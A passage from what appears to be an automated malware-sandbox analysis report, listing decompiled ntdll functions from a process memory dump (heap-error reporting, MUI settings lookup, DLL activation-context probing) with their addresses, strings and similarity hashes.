					E00ADB150("Parameter1: %p\n",  *0xbc58a4);
				}
				_t115 =  *0xbc58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00ADB150();
					} else {
						E00ADB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00ADB150("Parameter2: %p\n",  *0xbc58a8);
				}
				_t117 =  *0xbc58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00ADB150();
					} else {
						E00ADB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00ADB150("Parameter3: %p\n",  *0xbc58ac);
				}
				_t119 =  *0xbc58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00ADB150();
					} else {
						E00ADB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xbc58b4);
					E00ADB150("Last known valid blocks: before - %p, after - %p\n",  *0xbc58b0);
				} else {
					_t120 =  *0xbc58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00ADB150();
				} else {
					E00ADB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00ADB150("Stack trace available at %p\n", 0xbc58c0);
			}











                                                                                                            0x00b91c10
                                                                                                            0x00b91c16
                                                                                                            0x00b91c1e
                                                                                                            0x00b91c3d
                                                                                                            0x00b91c3e
                                                                                                            0x00b91c20
                                                                                                            0x00b91c35
                                                                                                            0x00b91c3a
                                                                                                            0x00b91c44
                                                                                                            0x00b91c55
                                                                                                            0x00b91c5a
                                                                                                            0x00b91c65
                                                                                                            0x00b91c67
                                                                                                            0x00000000
                                                                                                            0x00b91c6e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b91c67
                                                                                                            0x00b91cdc
                                                                                                            0x00b91ce5
                                                                                                            0x00b91d04
                                                                                                            0x00b91d05
                                                                                                            0x00b91ce7
                                                                                                            0x00b91cfc
                                                                                                            0x00b91d01
                                                                                                            0x00b91d0b
                                                                                                            0x00b91d17
                                                                                                            0x00b91d1f
                                                                                                            0x00b91d25
                                                                                                            0x00b91d30
                                                                                                            0x00b91d4f
                                                                                                            0x00b91d50
                                                                                                            0x00b91d32
                                                                                                            0x00b91d47
                                                                                                            0x00b91d4c
                                                                                                            0x00b91d61
                                                                                                            0x00b91d67
                                                                                                            0x00b91d68
                                                                                                            0x00b91d6e
                                                                                                            0x00b91d79
                                                                                                            0x00b91d98
                                                                                                            0x00b91d99
                                                                                                            0x00b91d7b
                                                                                                            0x00b91d90
                                                                                                            0x00b91d95
                                                                                                            0x00b91daa
                                                                                                            0x00b91db0
                                                                                                            0x00b91db1
                                                                                                            0x00b91db7
                                                                                                            0x00b91dc2
                                                                                                            0x00b91de1
                                                                                                            0x00b91de2
                                                                                                            0x00b91dc4
                                                                                                            0x00b91dd9
                                                                                                            0x00b91dde
                                                                                                            0x00b91df3
                                                                                                            0x00b91df9
                                                                                                            0x00b91dfa
                                                                                                            0x00b91e00
                                                                                                            0x00b91e0a
                                                                                                            0x00b91e13
                                                                                                            0x00b91e32
                                                                                                            0x00b91e33
                                                                                                            0x00b91e15
                                                                                                            0x00b91e2a
                                                                                                            0x00b91e2f
                                                                                                            0x00b91e39
                                                                                                            0x00b91e4a
                                                                                                            0x00b91e02
                                                                                                            0x00b91e02
                                                                                                            0x00b91e08
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b91e08
                                                                                                            0x00b91e5b
                                                                                                            0x00b91e7a
                                                                                                            0x00b91e7b
                                                                                                            0x00b91e5d
                                                                                                            0x00b91e72
                                                                                                            0x00b91e77
                                                                                                            0x00b91e95

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                            • API String ID: 0-2897834094
                                                                                                            • Opcode ID: f265de922ed9dd400c3d965474302f6adeac8b725e0171c243ae4285e18bded4
                                                                                                            • Instruction ID: ee7337e92cc7432e41f86e38e312fd72e622839fc923cf2719575e927d6170da
                                                                                                            • Opcode Fuzzy Hash: f265de922ed9dd400c3d965474302f6adeac8b725e0171c243ae4285e18bded4
                                                                                                            • Instruction Fuzzy Hash: 4E61B636561546DFCB11DB88D995E2073F4EB08B21B1A89BEF40A6F352D7349C80AA29
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AE3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E00AE3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00AE1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00AE1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00AE1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00AE1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00AE1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00AF4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00B1F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00B21370(_t276, 0xab4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00B1BB40(0,  &_v68, _t170);
									if(L00AE43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00B1BB40(_t257,  &_v68, _t243);
								if(L00AE43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00B21370(_t278, 0xab4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00AF4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00B1F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00B21370(_v16, 0xab4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00B1BB40(_t262,  &_v68, _t244);
								if(L00AE43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00B21370(_t282, 0xab4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00B1BB40(_t262,  &_v68, _t201);
							if(L00AE43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00AF4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00B1F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00B21370(_t280, 0xab4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00B1BB40(_t267,  &_v68, _t245);
							if(L00AE43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00B21370(_t284, 0xab4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00B1BB40(_t267,  &_v68, _t224);
						if(L00AE43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                            0x00ae3d3c
                                                                                                            0x00ae3d42
                                                                                                            0x00ae3d44
                                                                                                            0x00ae3d46
                                                                                                            0x00ae3d49
                                                                                                            0x00ae3d4c
                                                                                                            0x00ae3d4f
                                                                                                            0x00ae3d52
                                                                                                            0x00ae3d55
                                                                                                            0x00ae3d58
                                                                                                            0x00ae3d5b
                                                                                                            0x00ae3d5f
                                                                                                            0x00ae3d61
                                                                                                            0x00ae3d66
                                                                                                            0x00b38213
                                                                                                            0x00b38218
                                                                                                            0x00ae4085
                                                                                                            0x00ae4088
                                                                                                            0x00ae408e
                                                                                                            0x00ae4094
                                                                                                            0x00ae409a
                                                                                                            0x00ae40a0
                                                                                                            0x00ae40a6
                                                                                                            0x00ae40a9
                                                                                                            0x00ae40af
                                                                                                            0x00ae40b6
                                                                                                            0x00ae40bd
                                                                                                            0x00ae40bd
                                                                                                            0x00ae3d83
                                                                                                            0x00b3821f
                                                                                                            0x00b38229
                                                                                                            0x00b38238
                                                                                                            0x00b38238
                                                                                                            0x00b3823d
                                                                                                            0x00b3823d
                                                                                                            0x00ae3da0
                                                                                                            0x00ae3daf
                                                                                                            0x00ae3db5
                                                                                                            0x00ae3dba
                                                                                                            0x00ae3dba
                                                                                                            0x00ae3dd4
                                                                                                            0x00ae3e94
                                                                                                            0x00ae3eab
                                                                                                            0x00ae3f6d
                                                                                                            0x00ae3f84
                                                                                                            0x00ae406b
                                                                                                            0x00ae406b
                                                                                                            0x00ae406e
                                                                                                            0x00ae406e
                                                                                                            0x00ae4070
                                                                                                            0x00ae4074
                                                                                                            0x00b38351
                                                                                                            0x00b38351
                                                                                                            0x00ae407a
                                                                                                            0x00ae407f
                                                                                                            0x00b3835d
                                                                                                            0x00b38370
                                                                                                            0x00b38377
                                                                                                            0x00b38379
                                                                                                            0x00b3837c
                                                                                                            0x00b3837c
                                                                                                            0x00b3835d
                                                                                                            0x00000000
                                                                                                            0x00ae407f
                                                                                                            0x00ae3f8a
                                                                                                            0x00ae3f8d
                                                                                                            0x00ae3f90
                                                                                                            0x00ae3f95
                                                                                                            0x00b3830d
                                                                                                            0x00b3830f
                                                                                                            0x00ae3f9b
                                                                                                            0x00ae3fac
                                                                                                            0x00ae3fae
                                                                                                            0x00ae3fb1
                                                                                                            0x00ae3fb1
                                                                                                            0x00ae3fb6
                                                                                                            0x00b38317
                                                                                                            0x00b3831a
                                                                                                            0x00000000
                                                                                                            0x00ae3fbc
                                                                                                            0x00ae3fc1
                                                                                                            0x00ae3fc9
                                                                                                            0x00ae3fd7
                                                                                                            0x00ae3fda
                                                                                                            0x00ae3fdd
                                                                                                            0x00ae4021
                                                                                                            0x00ae4021
                                                                                                            0x00ae4029
                                                                                                            0x00ae4030
                                                                                                            0x00ae4044
                                                                                                            0x00ae4046
                                                                                                            0x00ae4046
                                                                                                            0x00ae4044
                                                                                                            0x00ae4049
                                                                                                            0x00b38327
                                                                                                            0x00b38334
                                                                                                            0x00b38339
                                                                                                            0x00b3833c
                                                                                                            0x00ae404f
                                                                                                            0x00ae404f
                                                                                                            0x00ae404f
                                                                                                            0x00ae4051
                                                                                                            0x00ae4056
                                                                                                            0x00ae4063
                                                                                                            0x00ae4063
                                                                                                            0x00ae4068
                                                                                                            0x00000000
                                                                                                            0x00ae4068
                                                                                                            0x00ae3fdf
                                                                                                            0x00ae3fe2
                                                                                                            0x00ae3fe4
                                                                                                            0x00ae3fe7
                                                                                                            0x00ae3fef
                                                                                                            0x00ae4003
                                                                                                            0x00ae4005
                                                                                                            0x00ae4005
                                                                                                            0x00ae400c
                                                                                                            0x00ae4013
                                                                                                            0x00ae4016
                                                                                                            0x00ae4017
                                                                                                            0x00ae401b
                                                                                                            0x00ae401e
                                                                                                            0x00000000
                                                                                                            0x00ae401e
                                                                                                            0x00ae3fb6
                                                                                                            0x00ae3eb1
                                                                                                            0x00ae3eb4
                                                                                                            0x00ae3eb7
                                                                                                            0x00ae3ebc
                                                                                                            0x00b382a9
                                                                                                            0x00b382ab
                                                                                                            0x00ae3ec2
                                                                                                            0x00ae3ed3
                                                                                                            0x00ae3ed5
                                                                                                            0x00ae3ed8
                                                                                                            0x00ae3ed8
                                                                                                            0x00ae3edd
                                                                                                            0x00b382b3
                                                                                                            0x00b382b6
                                                                                                            0x00000000
                                                                                                            0x00ae3ee3
                                                                                                            0x00ae3ee8
                                                                                                            0x00ae3eed
                                                                                                            0x00ae3ef0
                                                                                                            0x00ae3ef3
                                                                                                            0x00ae3f02
                                                                                                            0x00ae3f05
                                                                                                            0x00ae3f08
                                                                                                            0x00b382c0
                                                                                                            0x00b382c3
                                                                                                            0x00b382c5
                                                                                                            0x00b382c8
                                                                                                            0x00b382d0
                                                                                                            0x00b382e4
                                                                                                            0x00b382e6
                                                                                                            0x00b382e6
                                                                                                            0x00b382ed
                                                                                                            0x00b382f4
                                                                                                            0x00b382f7
                                                                                                            0x00b382f8
                                                                                                            0x00b382fc
                                                                                                            0x00b382ff
                                                                                                            0x00b382ff
                                                                                                            0x00ae3f0e
                                                                                                            0x00ae3f11
                                                                                                            0x00ae3f16
                                                                                                            0x00ae3f1d
                                                                                                            0x00ae3f31
                                                                                                            0x00b38307
                                                                                                            0x00b38307
                                                                                                            0x00ae3f31
                                                                                                            0x00ae3f39
                                                                                                            0x00ae3f48
                                                                                                            0x00ae3f4d
                                                                                                            0x00ae3f50
                                                                                                            0x00ae3f50
                                                                                                            0x00ae3f53
                                                                                                            0x00ae3f58
                                                                                                            0x00ae3f65
                                                                                                            0x00ae3f65
                                                                                                            0x00ae3f6a
                                                                                                            0x00000000
                                                                                                            0x00ae3f6a
                                                                                                            0x00ae3edd
                                                                                                            0x00ae3dda
                                                                                                            0x00ae3ddd
                                                                                                            0x00ae3de0
                                                                                                            0x00ae3de5
                                                                                                            0x00b38245
                                                                                                            0x00ae3deb
                                                                                                            0x00ae3df7
                                                                                                            0x00ae3dfc
                                                                                                            0x00ae3dfe
                                                                                                            0x00ae3e01
                                                                                                            0x00ae3e01
                                                                                                            0x00ae3e06
                                                                                                            0x00b3824d
                                                                                                            0x00b3824f
                                                                                                            0x00b38254
                                                                                                            0x00000000
                                                                                                            0x00ae3e0c
                                                                                                            0x00ae3e11
                                                                                                            0x00ae3e16
                                                                                                            0x00ae3e19
                                                                                                            0x00ae3e29
                                                                                                            0x00ae3e2c
                                                                                                            0x00ae3e2f
                                                                                                            0x00b3825c
                                                                                                            0x00b3825f
                                                                                                            0x00b38261
                                                                                                            0x00b38264
                                                                                                            0x00b3826c
                                                                                                            0x00b38280
                                                                                                            0x00b38282
                                                                                                            0x00b38282
                                                                                                            0x00b38289
                                                                                                            0x00b38290
                                                                                                            0x00b38293
                                                                                                            0x00b38294
                                                                                                            0x00b38298
                                                                                                            0x00b3829b
                                                                                                            0x00b3829b
                                                                                                            0x00ae3e35
                                                                                                            0x00ae3e38
                                                                                                            0x00ae3e3d
                                                                                                            0x00ae3e44
                                                                                                            0x00ae3e58
                                                                                                            0x00b382a3
                                                                                                            0x00b382a3
                                                                                                            0x00ae3e58
                                                                                                            0x00ae3e60
                                                                                                            0x00ae3e6f
                                                                                                            0x00ae3e74
                                                                                                            0x00ae3e77
                                                                                                            0x00ae3e77
                                                                                                            0x00ae3e7a
                                                                                                            0x00ae3e7f
                                                                                                            0x00ae3e8c
                                                                                                            0x00ae3e8c
                                                                                                            0x00ae3e91
                                                                                                            0x00000000
                                                                                                            0x00ae3e91

                                                                                                            Strings
                                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 00AE3D8C
                                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 00AE3E97
                                                                                                            • Kernel-MUI-Language-SKU, xrefs: 00AE3F70
                                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 00AE3DC0
                                                                                                            • WindowsExcludedProcs, xrefs: 00AE3D6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                            • API String ID: 0-258546922
                                                                                                            • Opcode ID: 69ae94bf85c8f528b09866c79df78d064706d29bd79962e5cfb60506c6569fd0
                                                                                                            • Instruction ID: 5d8a68a65bf281e5580b87a9be8b781b0ca73e3f7e6f09dd2920df65475a1942
                                                                                                            • Opcode Fuzzy Hash: 69ae94bf85c8f528b09866c79df78d064706d29bd79962e5cfb60506c6569fd0
                                                                                                            • Instruction Fuzzy Hash: 66F11972D00659EBCB11DF99C981AEEBBF9FF48750F1500AAF505A7251EB349E01CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B08E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E00B08E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xbcd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xbc8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xbc5780 & 0x00000003) != 0) {
							E00B55510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xbc5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00B1B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xbc7984; // 0x672ba0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xbc8464; // 0x74790110
					 *0xbcb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00B09B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xbc5780 & 0x00000005) != 0) {
						_push(_t49);
						E00B55510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                            0x00b08e0f
                                                                                                            0x00b08e16
                                                                                                            0x00b08e19
                                                                                                            0x00b08e1b
                                                                                                            0x00b08e21
                                                                                                            0x00b08e7f
                                                                                                            0x00b08e85
                                                                                                            0x00b49354
                                                                                                            0x00b4936c
                                                                                                            0x00b49371
                                                                                                            0x00b4937b
                                                                                                            0x00b49381
                                                                                                            0x00b49381
                                                                                                            0x00b4937b
                                                                                                            0x00b08e9d
                                                                                                            0x00b08e9d
                                                                                                            0x00b08e29
                                                                                                            0x00b08e2c
                                                                                                            0x00b08e38
                                                                                                            0x00b08e3e
                                                                                                            0x00b08e43
                                                                                                            0x00b08eb5
                                                                                                            0x00b08eb9
                                                                                                            0x00b492aa
                                                                                                            0x00b492af
                                                                                                            0x00b492e8
                                                                                                            0x00b492e8
                                                                                                            0x00b492af
                                                                                                            0x00b08eb9
                                                                                                            0x00b08e45
                                                                                                            0x00b08e53
                                                                                                            0x00b08e5b
                                                                                                            0x00b08e5f
                                                                                                            0x00b08e78
                                                                                                            0x00b08e78
                                                                                                            0x00b08e7d
                                                                                                            0x00b08ec3
                                                                                                            0x00b08ecd
                                                                                                            0x00b08ed2
                                                                                                            0x00b08ed2
                                                                                                            0x00b08ec5
                                                                                                            0x00b08ec5
                                                                                                            0x00000000
                                                                                                            0x00b08e7d
                                                                                                            0x00b08e67
                                                                                                            0x00b08ea4
                                                                                                            0x00b4931a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b49320
                                                                                                            0x00b08ea4
                                                                                                            0x00b08e70
                                                                                                            0x00b49325
                                                                                                            0x00b49340
                                                                                                            0x00b49345
                                                                                                            0x00b49345
                                                                                                            0x00b08e76
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00B4932A
                                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 00B4933B, 00B49367
                                                                                                            • LdrpFindDllActivationContext, xrefs: 00B49331, 00B4935D
                                                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 00B49357
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                            • API String ID: 0-3779518884
                                                                                                            • Opcode ID: 5f1b6bb2ef97550402f3ef2ac94be4e2b6f08526f1d25e820cf61a08031a3ea6
                                                                                                            • Instruction ID: 3f762d9d19c2de69d047fd13f5d76ea2ff3f72cdc1995aaa23c7483d04ddac56
                                                                                                            • Opcode Fuzzy Hash: 5f1b6bb2ef97550402f3ef2ac94be4e2b6f08526f1d25e820cf61a08031a3ea6
                                                                                                            • Instruction Fuzzy Hash: 3141E931A00315AFDB35AB14D88DF76BEE5FB15354F0585E9E888571E2EF706F809281
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AE8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E00AE8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
